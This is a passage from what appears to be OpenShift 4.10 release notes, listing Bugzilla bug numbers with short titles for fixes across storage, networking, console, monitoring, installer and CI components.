2003651 - ODF4.9+LSO4.8 installation via UI, StorageCluster move to error state
2003655 - [IPI ON-PREM] Keepalived chk_default_ingress track script failed even though default router pod runs on node
2003683 - Samples operator is panicking in CI
2003711 - [UI] Empty file ceph-external-cluster-details-exporter.py downloaded from external cluster "Connection Details" page
2003715 - Error on creating local volume set after selection of the volume mode
2003743 - Remove workaround keeping /boot RW for kdump support
2003775 - etcd pod on CrashLoopBackOff after master replacement procedure
2003788 - CSR reconciler report error constantly when BYOH CSR approved by other Approver
2003792 - Monitoring metrics query graph flyover panel is useless
2003808 - Add Sprint 207 translations
2003845 - Project admin cannot access image vulnerabilities view
2003859 - sdn emits events with garbage messages
2003896 - (release-4.10) ApiRequestCounts conditional gatherer
2004009 - 4.10: Fix multi-az zone scheduling e2e for 5 control plane replicas
2004051 - CMO can report as being Degraded while node-exporter is deployed on all nodes
2004059 - [e2e][automation] fix current tests for downstream
2004060 - Trying to use basic spring boot sample causes crash on Firefox
2004101 - [UI] When creating storageSystem deployment type dropdown under advanced setting doesn't close after selection
2004127 - [flake] openshift-controller-manager event reason/SuccessfulDelete occurs too frequently
2004203 - build config's created prior to 4.8 with image change triggers can result in trigger storm in OCM/openshift-apiserver
2004313 - [RHOCP 4.9.0-rc.0] Failing to deploy Azure cluster from the macOS installer - ignition_bootstrap.ign: no such file or directory
2004449 - Boot option recovery menu prevents image boot
2004451 - The backup filename displayed in the RecentBackup message is incorrect
2004459 - QE - Modified the AddFlow gherkin scripts and automation scripts
2004508 - TuneD issues with the recent ConfigParser changes.
2004510 - openshift-gitops operator hooks gets unauthorized (401) errors during jobs executions
2004542 - [osp][octavia lb] cannot create LoadBalancer type svcs
2004578 - Monitoring and node labels missing for an external storage platform
2004585 - prometheus-k8s-0 cpu usage keeps increasing for the first 3 days
2004596 - [4.10] Bootimage bump tracker
2004597 - Duplicate ramdisk log containers running
2004600 - Duplicate ramdisk log containers running
2004609 - output of "crictl inspectp" is not complete
2004625 - BMC credentials could be logged if they change
2004632 - When LE takes a large amount of time, multiple whereabouts are seen
2004721 - ptp/worker custom threshold doesn't change ptp events threshold
2004736 - [knative] Create button on new Broker form is inactive despite form being filled
2004796 - [e2e][automation] add test for vm scheduling policy
2004814 - (release-4.10) OCM controller - change type of the etc-pki-entitlement secret to opaque
2004870 - [External Mode] Insufficient spacing along y-axis in RGW Latency Performance Card
2004901 - [e2e][automation] improve kubevirt devconsole tests
2004962 - Console frontend job consuming too much CPU in CI
2005014 - state of ODF StorageSystem is misreported during installation or uninstallation
2005052 - Adding a MachineSet selector matchLabel causes orphaned Machines
2005179 - pods status filter is not taking effect
2005182 - sync list of deprecated apis about to be removed
2005282 - Storage cluster name is given as title in StorageSystem details page
2005355 - setuptools 58 makes Kuryr CI fail
2005407 - ClusterNotUpgradeable Alert should be set to Severity Info
2005415 - PTP operator with sidecar api configured throws bind: address already in use
2005507 - SNO spoke cluster failing to reach coreos.live.rootfs_url is missing url in console
2005554 - The switch status of the button "Show default project" is not revealed correctly in code
2005581 - 4.8.12 to 4.9 upgrade hung due to cluster-version-operator pod CrashLoopBackOff: error creating clients: invalid configuration: no configuration has been provided, try setting KUBERNETES_MASTER environment variable
2005761 - QE - Implementing crw-basic feature file
2005783 - Fix accessibility issues in the "Internal" and "Internal - Attached Mode" Installation Flow
2005811 - vSphere Problem Detector operator - ServerFaultCode: InvalidProperty
2005854 - SSH NodePort service is created for each VM
2005901 - KS, KCM and KA going Degraded during master nodes upgrade
2005902 - Current UI flow for MCG only deployment is confusing and doesn't reciprocate any message to the end-user
2005926 - PTP operator NodeOutOfPTPSync rule is using max offset from the master instead of openshift_ptp_clock_state metrics
2005971 - Change telemeter to report the Application Services product usage metrics
2005997 - SELinux domain container_logreader_t does not have a policy to follow sym links for log files
2006025 - Description to use an existing StorageClass while creating StorageSystem needs to be re-phrased
2006060 - ocs-storagecluster-storagesystem details are missing on UI for MCG Only and MCG only in LSO mode deployment types
2006101 - Power off fails for drivers that don't support Soft power off
2006243 - Metal IPI upgrade jobs are running out of disk space
2006291 - bootstrapProvisioningIP set incorrectly when provisioningNetworkCIDR doesn't use the 0th address
2006308 - Backing Store YAML tab on click displays a blank screen on UI
2006325 - Multicast is broken across nodes
2006329 - Console only allows Web Terminal Operator to be installed in OpenShift Operators
2006364 - IBM Cloud: Set resourceGroupId for resourceGroups, not simply resource
2006561 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't have failing rules evaluation [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2006690 - OS boot failure "x64 Exception Type 06 - Invalid Opcode Exception"
2006714 - add retry for etcd errors in kube-apiserver
2006767 - KubePodCrashLooping may not fire
2006803 - Set CoreDNS cache entries for forwarded zones
2006861 - Add Sprint 207 part 2 translations
2006945 - race condition can cause crashlooping bootstrap kube-apiserver in cluster-bootstrap
2006947 - e2e-aws-proxy for 4.10 is permafailing with samples operator errors
2006975 - clusteroperator/etcd status condition should not change reasons frequently due to EtcdEndpointsDegraded
2007085 - Intermittent failure mounting /run/media/iso when booting live ISO from USB stick
2007136 - Creation of BackingStore, BucketClass, NamespaceStore fails
2007271 - CI Integration for Knative test cases
2007289 - kubevirt tests are failing in CI
2007322 - Devfile/Dockerfile import does not work for unsupported git host
2007328 - Updated patternfly to v4.125.3 and pf.quickstarts to v1.2.3.
2007379 - Events are not generated for master offset for ordinary clock
2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace
2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address
2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error
2007522 - No new local-storage-operator-metadata-container is build for 4.10
2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10
2007580 - Azure cilium installs are failing e2e tests
2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10
2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes
2007692 - 4.9 "old-rhcos" jobs are permafailing with storage test failures
2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow
2007757 - must-gather extracts imagestreams in the "openshift" namespace, but not Templates
2007802 - AWS machine actuator get stuck if machine is completely missing
2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator
2008119 - The serviceAccountIssuer field on Authentication CR is reseted to “” when installation process
2008151 - Topology breaks on clicking in empty state
2008185 - Console operator go.mod should use go 1.16.version
2008201 - openstack-az job is failing on haproxy idle test
2008207 - vsphere CSI driver doesn't set resource limits
2008223 - gather_audit_logs: fix oc command line to get the current audit profile
2008235 - The Save button in the Edit DC form remains disabled
2008256 - Update Internationalization README with scope info
2008321 - Add correct documentation link for MON_DISK_LOW
2008462 - Disable PodSecurity feature gate for 4.10
2008490 - Backing store details page does not contain all the kebab actions.
2008521 - gcp-hostname service should correct invalid search entries in resolv.conf
2008532 - CreateContainerConfigError:: failed to prepare subPath for volumeMount
2008539 - Registry doesn't fall back to secondary ImageContentSourcePolicy Mirror
2008540 - HighlyAvailableWorkloadIncorrectlySpread always fires on upgrade on cluster with two workers
2008599 - Azure Stack UPI does not have Internal Load Balancer
2008612 - Plugin asset proxy does not pass through browser cache headers
2008712 - VPA webhook timeout prevents all pods from starting
2008733 - kube-scheduler: exposed /debug/pprof port
2008911 - Prometheus repeatedly scaling prometheus-operator replica set
2008926 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2008987 - OpenShift SDN Hosted Egress IP's are not being scheduled to nodes after upgrade to 4.8.12
2009055 - Instances of OCS to be replaced with ODF on UI
2009078 - NetworkPodsCrashLooping alerts in upgrade CI jobs
2009083 - opm blocks pruning of existing bundles during add
2009111 - [IPI-on-GCP] 'Install a cluster with nested virtualization enabled' failed due to unable to launch compute instances
2009131 - [e2e][automation] add more test about vmi
2009148 - [e2e][automation] test vm nic presets and options
2009233 - ACM policy object generated by PolicyGen conflicting with OLM Operator
2009253 - [BM] [IPI] [DualStack] apiVIP and ingressVIP should be of the same primary IP family
2009298 - Service created for VM SSH access is not owned by the VM and thus is not deleted if the VM is deleted
2009384 - UI changes to support BindableKinds CRD changes
2009404 - ovnkube-node pod enters CrashLoopBackOff after OVN_IMAGE is swapped
2009424 - Deployment upgrade is failing availability check
2009454 - Change web terminal subscription permissions from get to list
2009465 - container-selinux should come from rhel8-appstream
2009514 - Bump OVS to 2.16-15
2009555 - Supermicro X11 system not booting from vMedia with AI
2009623 - Console: Observe > Metrics page: Table pagination menu shows bullet points
2009664 - Git Import: Edit of knative service doesn't work as expected for git import flow
2009699 - Failure to validate flavor RAM
2009754 - Footer is not sticky anymore in import forms
2009785 - CRI-O's version file should be pinned by MCO
2009791 - Installer: ibmcloud ignores install-config values
2009823 - [sig-arch] events should not repeat pathologically - reason/VSphereOlderVersionDetected Marking cluster un-upgradeable because one or more VMs are on hardware version vmx-13
2009840 - cannot build extensions on aarch64 because of unavailability of rhel-8-advanced-virt repo
2009859 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2009873 - Stale Logical Router Policies and Annotations for a given node
2009879 - There should be test-suite coverage to ensure admin-acks work as expected
2009888 - SRO package name collision between official and community version
2010073 - uninstalling and then reinstalling sriov-network-operator is not working
2010174 - 2 PVs get created unexpectedly with different paths that actually refer to the same device on the node.
2010181 - Environment variables not getting reset on reload on deployment edit form
2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2010341 - OpenShift Alerting Rules Style-Guide Compliance
2010342 - Local console builds can have out of memory errors
2010345 - OpenShift Alerting Rules Style-Guide Compliance
2010348 - Reverts PIE build mode for K8S components
2010352 - OpenShift Alerting Rules Style-Guide Compliance
2010354 - OpenShift Alerting Rules Style-Guide Compliance
2010359 - OpenShift Alerting Rules Style-Guide Compliance
2010368 - OpenShift Alerting Rules Style-Guide Compliance
2010376 - OpenShift Alerting Rules Style-Guide Compliance
2010662 - Cluster is unhealthy after image-registry-operator tests
2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)
2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API
2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address
2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing
2010864 - Failure building EFS operator
2010910 - ptp worker events unable to identify interface for multiple interfaces
2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24
2010921 - Azure Stack Hub does not handle additionalTrustBundle
2010931 - SRO CSV uses non default category "Drivers and plugins"
2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well.
2011038 - optional operator conditions are confusing
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass
2011171 - diskmaker-manager constantly redeployed by LSO when creating LV's
2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image
2011368 - Tooltip in pipeline visualization shows misleading data
2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels
2011411 - Managed Service's Cluster overview page contains link to missing Storage dashboards
2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster
2011513 - Kubelet rejects pods that use resources that should be freed by completed pods
2011668 - Machine stuck in deleting phase in VMware "reconciler failed to Delete machine"
2011693 - (release-4.10) "insightsclient_request_recvreport_total" metric is always incremented
2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn't export namespace labels anymore
2011733 - Repository README points to broken documentarion link
2011753 - Ironic resumes clean before raid configuration job is actually completed
2011809 - The nodes page in the openshift console doesn't work. You just get a blank page
2011822 - Obfuscation doesn't work at clusters with OVN
2011882 - SRO helm charts not synced with templates
2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot
2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages
2011903 - vsphere-problem-detector: session leak
2011927 - OLM should allow users to specify a proxy for GRPC connections
2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods
2011960 - [tracker] Storage operator is not available after reboot cluster instances
2011971 - ICNI2 pods are stuck in ContainerCreating state
2011972 - Ingress operator not creating wildcard route for hypershift clusters
2011977 - SRO bundle references non-existent image
2012069 - Refactoring Status controller
2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI
2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group
2012233 - [IBMCLOUD] IPI: "Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)"
2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig
2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off
2012407 - [e2e][automation] improve vm tab console tests
2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don't have namespace label
2012562 - migration condition is not detected in list view
2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written
2012780 - The port 50936 used by haproxy is occupied by kube-apiserver
2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working
2012902 - Neutron Ports assigned to Completed Pods are not reused Edit
2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack
2012971 - Disable operands deletes
2013034 - Cannot install to openshift-nmstate namespace
2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)
2013199 - post reboot of node SRIOV policy taking huge time
2013203 - UI breaks when trying to create block pool before storage cluster/system creation
2013222 - Full breakage for nightly payload promotion
2013273 - Nil pointer exception when phc2sys options are missing
2013321 - TuneD: high CPU utilization of the TuneD daemon.
2013416 - Multiple assets emit different content to the same filename
2013431 - Application selector dropdown has incorrect font-size and positioning
2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2013545 - Service binding created outside topology is not visible
2013599 - Scorecard support storage is not included in ocp4.9
2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)
2013646 - fsync controller will show false positive if gaps in metrics are observed.
2013710 - ZTP Operator subscriptions for 4.9 release branch should point to 4.9 by default
2013751 - Service details page is showing wrong in-cluster hostname
2013787 - There are two tittle 'Network Attachment Definition Details' on NAD details page
2013871 - Resource table headings are not aligned with their column data
2013895 - Cannot enable accelerated network via MachineSets on Azure
2013920 - "--collector.filesystem.ignored-mount-points is DEPRECATED and will be removed in 2.0.0, use --collector.filesystem.mount-points-exclude"
2013930 - Create Buttons enabled for Bucket Class, Backingstore and Namespace Store in the absence of Storagesystem(or MCG)
2013969 - oVIrt CSI driver fails on creating PVCs on hosted engine storage domain
2013990 - Observe dashboard crashs on reload when perspective has changed (in another tab)
2013996 - Project detail page: Action "Delete Project" does nothing for the default project
2014071 - Payload imagestream new tags not properly updated during cluster upgrade
2014153 - SRIOV exclusive pooling
2014202 - [OCP-4.8.10] OVN-Kubernetes: service IP is not responding when egressIP set to the namespace
2014238 - AWS console test is failing on importing duplicate YAML definitions
2014245 - Several aria-labels, external links, and labels aren't internationalized
2014248 - Several files aren't internationalized
2014352 - Could not filter out machine by using node name on machines page
2014464 - Unexpected spacing/padding below navigation groups in developer perspective
2014471 - Helm Release notes tab is not automatically open after installing a chart for other languages
2014486 - Integration Tests: OLM single namespace operator tests failing
2014488 - Custom operator cannot change orders of condition tables
2014497 - Regex slows down different forms and creates too much recursion errors in the log
2014538 - Kuryr controller crash looping on self._get_vip_port(loadbalancer).id 'NoneType' object has no attribute 'id'
2014614 - Metrics scraping requests should be assigned to exempt priority level
2014710 - TestIngressStatus test is broken on Azure
2014954 - The prometheus-k8s-{0,1} pods are CrashLoopBackoff repeatedly
2014995 - oc adm must-gather cannot gather audit logs with 'None' audit profile
2015115 - [RFE] PCI passthrough
2015133 - [IBMCLOUD] ServiceID API key credentials seems to be insufficient for ccoctl '--resource-group-name' parameter
2015154 - Support ports defined networks and primarySubnet
2015274 - Yarn dev fails after updates to dynamic plugin JSON schema logic
2015337 - 4.9.0 GA MetalLB operator image references need to be adjusted to match production
2015386 - Possibility to add labels to the built-in OCP alerts
2015395 - Table head on Affinity Rules modal is not fully expanded
2015416 - CI implementation for Topology plugin
2015418 - Project Filesystem query returns No datapoints found
2015420 - No vm resource in project view's inventory
2015422 - No conflict checking on snapshot name
2015472 - Form and YAML view switch button should have distinguishable status
2015481 - [4.10] sriov-network-operator daemon pods are failing to start
2015493 - Cloud Controller Manager Operator does not respect 'additionalTrustBundle' setting
2015496 - Storage - PersistentVolumes : Claim colum value 'No Claim' in English
2015498 - [UI] Add capacity when not applicable (for MCG only deployment and External mode cluster) fails to pass any info. to user and tries to just load a blank screen on 'Add Capacity' button click
2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu
2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain.
2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart 'x% used' is in English
2015549 - Observe - Metrics: Column heading and pagination text is in English
2015557 - Workloads - DeploymentConfigs : Error message is in English
2015568 - Compute - Nodes : CPU column's values are in English
2015635 - Storage operator fails causing installation to fail on ASH
2015660 - "Finishing boot source customization" screen should not use term "patched"
2015793 - [hypershift] The collect-profiles job's pods should run on the control-plane node
2015806 - Metrics view in Deployment reports "Forbidden" when not cluster-admin
2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning
2015837 - OS_CLOUD overwrites install-config's platform.openstack.cloud
2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch
2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail
2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)
2016008 - [4.10] Bootimage bump tracker
2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver
2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator
2016054 - No e2e CI presubmit configured for release component cluster-autoscaler
2016055 - No e2e CI presubmit configured for release component console
2016058 - openshift-sync does not synchronise in "ose-jenkins:v4.8"
2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager
2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers
2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters.
2016179 - Add Sprint 208 translations
2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager
2016235 - should update to 7.5.11 for grafana resources version label
2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails
2016334 - shiftstack: SRIOV nic reported as not supported
2016352 - Some pods start before CA resources are present
2016367 - Empty task box is getting created for a pipeline without finally task
2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts
2016438 - Feature flag gating is missing in few extensions contributed via knative plugin
2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc
2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets
2016453 - Complete i18n for GaugeChart defaults
2016479 - iface-id-ver is not getting updated for existing lsp
2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear
2016951 - dynamic actions list is not disabling "open console" for stopped vms
2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available
2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances
2017016 - [REF] Virtualization menu
2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn
2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly
2017130 - t is not a function error navigating to details page
2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue
2017244 - ovirt csi operator static files creation is in the wrong order
2017276 - [4.10] Volume mounts not created with the correct security context
2017327 - When run opm index prune failed with error removing operator package cic-operator FOREIGN KEY constraint failed.
2017427 - NTO does not restart TuneD daemon when profile application is taking too long
2017535 - Broken Argo CD link image on GitOps Details Page
2017547 - Siteconfig application sync fails with The AgentClusterInstall is invalid: spec.provisionRequirements.controlPlaneAgents: Required value when updating images references
2017564 - On-prem prepender dispatcher script overwrites DNS search settings
2017565 - CCMO does not handle additionalTrustBundle on Azure Stack
2017566 - MetalLB: Web Console -Create Address pool form shows address pool name twice
2017606 - [e2e][automation] add test to verify send key for VNC console
2017650 - [OVN]EgressFirewall cannot be applied correctly if cluster has windows nodes
2017656 - VM IP address is "undefined" under VM details -> ssh field
2017663 - SSH password authentication is disabled when public key is not supplied
2017680 - [gcp] Couldn’t enable support for instances with GPUs on GCP
2017732 - [KMS] Prevent creation of encryption enabled storageclass without KMS connection set
2017752 - (release-4.10) obfuscate identity provider attributes in collected authentication.operator.openshift.io resource
2017756 - overlaySize setting on containerruntimeconfig is ignored due to cri-o defaults
2017761 - [e2e][automation] dummy bug for 4.9 test dependency
2017872 - Add Sprint 209 translations
2017874 - The installer is incorrectly checking the quota for X instances instead of G and VT instances
2017879 - Add Chinese translation for "alternate"
2017882 - multus: add handling of pod UIDs passed from runtime
2017909 - [ICNI 2.0] ovnkube-masters stop processing add/del events for pods
2018042 - HorizontalPodAutoscaler CPU averageValue did not show up in HPA metrics GUI
2018093 - Managed cluster should ensure control plane pods do not run in best-effort QoS
2018094 - the tooltip length is limited
2018152 - CNI pod is not restarted when It cannot start servers due to ports being used
2018208 - e2e-metal-ipi-ovn-ipv6 are failing 75% of the time
2018234 - user settings are saved in local storage instead of on cluster
2018264 - Delete Export button doesn't work in topology sidebar (general issue with unknown CSV?)
2018272 - Deployment managed by link and topology sidebar links to invalid resource page (at least for Exports)
2018275 - Topology graph doesn't show context menu for Export CSV
2018279 - Edit and Delete confirmation modals for managed resource should close when the managed resource is clicked
2018380 - Migrate docs links to access.redhat.com
2018413 - Error: context deadline exceeded, OCP 4.8.9
2018428 - PVC is deleted along with VM even with "Delete Disks" unchecked
2018445 - [e2e][automation] enhance tests for downstream
2018446 - [e2e][automation] move tests to different level
2018449 - [e2e][automation] add test about create/delete network attachment definition
2018490 - [4.10] Image provisioning fails with file name too long
2018495 - Fix typo in internationalization README
2018542 - Kernel upgrade does not reconcile DaemonSet
2018880 - Get 'No datapoints found.' when query metrics about alert rule KubeCPUQuotaOvercommit and KubeMemoryQuotaOvercommit
2018884 - QE - Adapt crw-basic feature file to OCP 4.9/4.10 changes
2018935 - go.sum not updated, that ART extracts version string from, WAS: Missing backport from 4.9 for Kube bump PR#950
2018965 - e2e-metal-ipi-upgrade is permafailing in 4.10
2018985 - The rootdisk size is 15Gi of windows VM in customize wizard
2019001 - AWS: Operator degraded (CredentialsFailing): 1 of 6 credentials requests are failing to sync.
2019096 - Update SRO leader election timeout to support SNO
2019129 - SRO in operator hub points to wrong repo for README
2019181 - Performance profile does not apply
2019198 - ptp offset metrics are not named according to the log output
2019219 - [IBMCLOUD]: cloud-provider-ibm missing IAM permissions in CCCMO CredentialRequest
2019284 - Stop action should not in the action list while VMI is not running
2019346 - zombie processes accumulation and Argument list too long
2019360 - [RFE] Virtualization Overview page
2019452 - Logger object in LSO appends to existing logger recursively
2019591 - Operator install modal body that scrolls has incorrect padding causing shadow position to be incorrect
2019634 - Pause and migration is enabled in action list for a user who has view only permission
2019636 - Actions in VM tabs should be disabled when user has view only permission
2019639 - "Take snapshot" should be disabled while VM image is still been importing
2019645 - Create button is not removed on "Virtual Machines" page for view only user
2019646 - Permission error should pop-up immediately while clicking "Create VM" button on template page for view only user
2019647 - "Remove favorite" and "Create new Template" should be disabled in template action list for view only user
2019717 - cant delete VM with un-owned pvc attached
2019722 - The shared-resource-csi-driver-node pod runs as “BestEffort” qosClass
2019739 - The shared-resource-csi-driver-node uses imagePullPolicy as "Always"
2019744 - [RFE] Suggest users to download newest RHEL 8 version
2019809 - [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level
2019827 - Display issue with top-level menu items running demo plugin
2019832 - 4.10 Nightlies blocked: Failed to upgrade authentication, operator was degraded
2019886 - Kuryr unable to finish ports recovery upon controller restart
2019948 - [RFE] Restructring Virtualization links
2019972 - The Nodes section doesn't display the csr of the nodes that are trying to join the cluster
2019977 - Installer doesn't validate region causing binary to hang with a 60 minute timeout
2019986 - Dynamic demo plugin fails to build
2019992 - instance:node_memory_utilisation:ratio metric is incorrect
2020001 - Update dockerfile for demo dynamic plugin to reflect dir change
2020003 - MCD does not regard "dangling" symlinks as a files, attempts to write through them on next backup, resulting in "not writing through dangling symlink" error and degradation.
2020107 - cluster-version-operator: remove runlevel from CVO namespace
2020153 - Creation of Windows high performance VM fails
2020216 - installer: Azure storage container blob where is stored bootstrap.ign file shouldn't be public
2020250 - Replacing deprecated ioutil
2020257 - Dynamic plugin with multiple webpack compilation passes may fail to build
2020275 - ClusterOperators link in console returns blank page during upgrades
2020377 - permissions error while using tcpdump option with must-gather
2020489 - coredns_dns metrics don't include the custom zone metrics data due to CoreDNS prometheus plugin is not defined
2020498 - "Show PromQL" button is disabled
2020625 - [AUTH-52] User fails to login from web console with keycloak OpenID IDP after enable group membership sync feature
2020638 - [4.7] CI conformance test failures related to CustomResourcePublishOpenAPI
2020664 - DOWN subports are not cleaned up
2020904 - When trying to create a connection from the Developer view between VMs, it fails
2021016 - 'Prometheus Stats' of dashboard 'Prometheus Overview' miss data on console compared with Grafana
2021017 - 404 page not found error on knative eventing page
2021031 - QE - Fix the topology CI scripts
2021048 - [RFE] Added MAC Spoof check
2021053 - Metallb operator presented as community operator
2021067 - Extensive number of requests from storage version operator in cluster
2021081 - Missing PolicyGenTemplate for configuring Local Storage Operator LocalVolumes
2021135 - [azure-file-csi-driver] "make unit-test" returns non-zero code, but tests pass
2021141 - Cluster should allow a fast rollout of kube-apiserver is failing on single node
2021151 - Sometimes the DU node does not get the performance profile configuration applied and MachineConfigPool stays stuck in Updating
2021152 - imagePullPolicy is "Always" for ptp operator images
2021191 - Project admins should be able to list available network attachment defintions
2021205 - Invalid URL in git import form causes validation to not happen on URL change
2021322 - cluster-api-provider-azure should populate purchase plan information
2021337 - Dynamic Plugins: ResourceLink doesn't render when passed a groupVersionKind
2021364 - Installer requires invalid AWS permission s3:GetBucketReplication
2021400 - Bump documentationBaseURL to 4.10
2021405 - [e2e][automation] VM creation wizard Cloud Init editor
2021433 - "[sig-builds][Feature:Builds][pullsearch] docker build where the registry is not specified" test fail permanently on disconnected
2021466 - [e2e][automation] Windows guest tool mount
2021544 - OCP 4.6.44 - Ingress VIP assigned as secondary IP in ovs-if-br-ex and added to resolv.conf as nameserver
2021551 - Build is not recognizing the USER group from an s2i image
2021607 - Unable to run openshift-install with a vcenter hostname that begins with a numeric character
2021629 - api request counts for current hour are incorrect
2021632 - [UI] Clicking on odf-operator breadcrumb from StorageCluster details page displays empty page
2021693 - Modals assigned modal-lg class are no longer the correct width
2021724 - Observe > Dashboards: Graph lines are not visible when obscured by other lines
2021731 - CCO occasionally down, reporting networksecurity.googleapis.com API as disabled
2021936 - Kubelet version in RPMs should be using Dockerfile label instead of git tags
2022050 - [BM][IPI] Failed during bootstrap - unable to read client-key /var/lib/kubelet/pki/kubelet-client-current.pem
2022053 - dpdk application with vhost-net is not able to start
2022114 - Console logging every proxy request
2022144 - 1 of 3 ovnkube-master pods stuck in clbo after ipi bm deployment - dualstack (Intermittent)
2022251 - wait interval in case of a failed upload due to 403 is unnecessarily long
2022399 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error .
2022447 - ServiceAccount in manifests conflicts with OLM
2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules.
2022509 - getOverrideForManifest does not check manifest.GVK.Group
2022536 - WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache
2022612 - no namespace field for "Kubernetes / Compute Resources / Namespace (Pods)" admin console dashboard
2022627 - Machine object not picking up external FIP added to an openstack vm
2022646 - configure-ovs.sh failure - Error: unknown connection 'WARN:'
2022707 - Observe / monitoring dashboard shows forbidden errors on Dev Sandbox
2022801 - Add Sprint 210 translations
2022811 - Fix kubelet log rotation file handle leak
2022812 - [SCALE] ovn-kube service controller executes unnecessary load balancer operations
2022824 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2022880 - Pipeline renders with minor visual artifact with certain task dependencies
2022886 - Incorrect URL in operator description
2023042 - CRI-O filters custom runtime allowed annotation when both custom workload and custom runtime sections specified under the config
2023060 - [e2e][automation] Windows VM with CDROM migration
2023077 - [e2e][automation] Home Overview Virtualization status
2023090 - [e2e][automation] Examples of Import URL for VM templates
2023102 - [e2e][automation] Cloudinit disk of VM from custom template
2023216 - ACL for a deleted egressfirewall still present on node join switch
2023228 - Remove Tech preview badge on Trigger components 1.6 OSP on OCP 4.9
2023238 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy
2023342 - SCC admission should take ephemeralContainers into account
2023356 - Devfiles can't be loaded in Safari on macOS (403 - Forbidden)
2023434 - Update Azure Machine Spec API to accept Marketplace Images
2023500 - Latency experienced while waiting for volumes to attach to node
2023522 - can't remove package from index: database is locked
2023560 - "Network Attachment Definitions" has no project field on the top in the list view
2023592 - [e2e][automation] add mac spoof check for nad
2023604 - ACL violation when deleting a provisioning-configuration resource
2023607 - console returns blank page when normal user without any projects visit Installed Operators page
2023638 - Downgrade support level for extended control plane integration to Dev Preview
2023657 - inconsistent behaviours of adding ssh key on rhel node between 4.9 and 4.10
2023675 - Changing CNV Namespace
2023779 - Fix Patch 104847 in 4.9
2023781 - initial hardware devices is not loading in wizard
2023832 - CCO updates lastTransitionTime for non-Status changes
2023839 - Bump recommended FCOS to 34.20211031.3.0
2023865 - Console css overrides prevent dynamic plug-in PatternFly tables from displaying correctly
